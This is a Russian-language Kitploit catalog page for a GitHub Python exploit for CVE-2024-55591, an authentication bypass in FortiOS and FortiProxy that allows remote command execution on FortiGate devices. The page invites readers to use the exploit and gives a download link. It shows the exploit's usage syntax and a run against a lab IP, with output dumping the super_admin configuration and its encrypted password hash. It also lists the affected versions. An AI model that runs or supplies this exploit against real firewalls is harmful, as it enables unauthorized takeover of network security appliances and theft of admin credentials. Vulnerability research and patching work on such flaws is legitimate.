Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
fortios-auth-bypass-exploit-CVE-2024-55591 — Python-эксплойт для CVE-2024-55591, обходящий аутентификацию FortiOS для выполнения удалённых команд на уязвимых устройствах FortiGate и FortiProxy. | Kitploit
Инструменты/GitHubGitHub/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubsysirq/fortios-auth-bypass-exploit-cve-2024-55591

fortios-auth-bypass-exploit-CVE-2024-55591

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Python-эксплойт для CVE-2024-55591, обходящий аутентификацию FortiOS для выполнения удалённых команд на уязвимых устройствах FortiGate и FortiProxy.

Репозиторий
341 год назадЕщё не проверено

CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Exploit

Описание

Используйте этот эксплойт, и вы сможете обойти аутентификацию и выполнять команды

ИСПОЛЬЗОВАНИЕ

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py 
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t

Демонстрация

image-20250122220404985

image-20250122220502121

image-20250122220502121

Вывод

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
    next
end

Затронутые версии

  • FortiOS 7.0.0 through 7.0.16
  • FortiProxy 7.0.0 through 7.0.19
  • FortiProxy 7.2.0 through 7.2.12
Скачать инструмент